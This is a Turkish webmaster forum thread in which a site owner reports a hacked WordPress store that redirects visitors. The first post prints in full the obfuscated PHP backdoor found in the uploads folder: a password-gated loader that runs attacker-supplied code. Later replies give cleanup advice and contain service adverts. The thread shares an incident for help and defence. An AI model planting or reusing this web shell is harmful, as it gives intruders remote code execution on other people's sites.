• 02-05-2022, 03:01:40
    #1
    Selamın AleykümMerhaba Arkadaşlar
    Şimdiden Hayırlı Bayramlar.


    Aktif olarak kullanılan, güzel satış yapan kendi kurduğum bir sitemiz mevcut, Dip Not: İmzamda yer alan site değil.
    birgün haber geldi site anasayfa farklı bir siteye yönleniyor,
    siteyi firefox tarayıcıdan açtım sıkıntı yok, telefondan chrome ile açtım yine sorun yok, tekrar bilgisayardan microsoft edge ile açtım site açıldıktan sonra farklı siteye yönlendi.
    kurcaladım ama birşey bulamadım, eklentileri kaldırdım yine olmadı, temaya baktım keza aynı, bende wp-content ve wp-config.php haricinde herşeyi sildim yeniden yükledim,
    site sorunsuz görünüyordu, siteye bugün wordfence kurup bir tarama yaptım, upload klasörü içine index.php atmışlar base64 ile şifrelenen bir dosya ve ben o dosyayı şimdi sildim.

    sanırım bir açık var ve açık şuan kullandığımız en son sürümde devam ediyorsa aynı işlemin tekrardan olması muhtemel, sitede kesinlikle marez tema ve eklenti yok, marez tema ve eklenti kullandığım bir sitem var onda kesinlikle sorun yok ve aynı sunucuyu kullanıyorum.

    başına gelen varmı? varsa wordfence haricinde nasıl bir tedbir aldı.

    Kolay Gelsin

    wordfence verdiği uyarı yazısı

    • Filename: wp-content/uploads/index.php
    • File Type: Not a core, theme, or plugin file from wordpress.org.
    • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php $b1 = "b"."ase"."64"."_d"."ec"."ode"; $kl = "
      The issue type is: Obfuscated:PHP/base64decode.10972
      Description: Obfuscation of a function call.


    upload klasörü içine atılan index.php içindeki kod.

    <?php $b1 = "b"."ase"."64"."_d"."ec"."ode"; $kl = "arr"."ay_merge"; $k1 = $kl($_POST,$_COOKIE,@$_REQUEST); if(isset($k1['lt']) && md5($k1['lt']) == $b1("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = $b1($k1['a']);file_put_contents(sys_get_temp_dir()."/tm",'<?php '.$lt);@include(sys_get_temp_dir()."/tm");@unlink(sys_get_temp_dir()."/tm");file_put_contents("tm",'<?php '.$lt);@include("tm");@unlink("tm");}else{echo $b1("c3lzdGVtZmlsZXNkb250dG91Y2g=");} ?>
  • 02-05-2022, 03:21:19
    #2
    hocam woonun son guncellenmesınde ve wordpress son guncellenmesınde acık vardı gecende daha sıte kurlu bırsey yok tema felan kullanıcı acıldı sıtede yetkılı sorunu cozdum elbet ama bazen bu kullandıgınız sunucu fırmasındanda kaynaklanıyor confıg cekılerek ıslemler ıle hacklınk sıstemı ıcın kullanılıyor hocam
    • vatanist_
    vatanist_ bunu beğendi.
    1 kişi bunu beğendi.
  • 02-05-2022, 03:33:23
    #3
    Misafir adlı üyeden alıntı: mesajı görüntüle
    hocam woonun son guncellenmesınde ve wordpress son guncellenmesınde acık vardı gecende daha sıte kurlu bırsey yok tema felan kullanıcı acıldı sıtede yetkılı sorunu cozdum elbet ama bazen bu kullandıgınız sunucu fırmasındanda kaynaklanıyor confıg cekılerek ıslemler ıle hacklınk sıstemı ıcın kullanılıyor hocam
    bende reseller var,
    firma r10'da benim bildiğim ve 3 yıldır kullandığım için emin ollarak söyleyebileceğim en güvenli firmalardan biri,
    inşAllah birdaha aynı sıkıntıyla karşılaşmayız, şuan wordface'den canlı trafik bölümüne baktığımda wp-login.php'de gezinen biri görünüyor, belkide üye oluyordur bilemem ama.

    Alıntı
    Council Bluffs, Iowa, United States
    was blocked by the Wordfence Security Network at
    https://------.com/wp-login.php
    01.05.2022 22:00:06 (5 hours 26 mins ago)
    IP: 35.224.250.64
    Hostname: 64.250.224.35.bc.googleusercontent.com
    Human/Bot: Human
    Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0
  • 02-05-2022, 03:37:49
    #4
    vatanist_ adlı üyeden alıntı: mesajı görüntüle
    bende reseller var,
    firma r10'da benim bildiğim ve 3 yıldır kullandığım için emin ollarak söyleyebileceğim en güvenli firmalardan biri,
    inşAllah birdaha aynı sıkıntıyla karşılaşmayız, şuan wordface'den canlı trafik bölümüne baktığımda wp-login.php'de gezinen biri görünüyor, belkide üye oluyordur bilemem ama.
    hocam ne fırmalar hack yedı shell yedı yanlıs anlamayında sunucu fırmanıza bır shel taraması kernel ıle yapılmasını rıca edın dosyalar eklenmıs olabılır cunku dosya yolu tm olarak vermıs sunucu ıcınde tmp var tm olarak dosya yolu belırtmıs sızde domaıne dosyalar bır shell taraması yaptırın hocam
    • vatanist_
    vatanist_ bunu beğendi.
    1 kişi bunu beğendi.
  • 02-05-2022, 03:42:35
    #5
    Misafir adlı üyeden alıntı: mesajı görüntüle
    hocam ne fırmalar hack yedı shell yedı yanlıs anlamayında sunucu fırmanıza bır shel taraması kernel ıle yapılmasını rıca edın dosyalar eklenmıs olabılır cunku dosya yolu tm olarak vermıs sunucu ıcınde tmp var tm olarak dosya yolu belırtmıs sızde domaıne dosyalar bır shell taraması yaptırın hocam
    teşekkürler firma ile görüşeceğim.
  • 02-05-2022, 08:13:00
    #6
    Merhaba, Websitenize güvenlik duvarı sağlayabiliriz piyasadaki tüm güvenlik açıklarını engellemektedir.
    Telegram; https://t.me/chesterfieldnew
  • 02-05-2022, 16:44:43
    #7
    Kurumsal PLUS
    Merhaba, sitenizi kontrol edebilir ve virüs, hack, arka kapı varsa kaldırabilirim.
    Konum: https://www.r10.net/wordpress-seo-gu...e-buyurun.html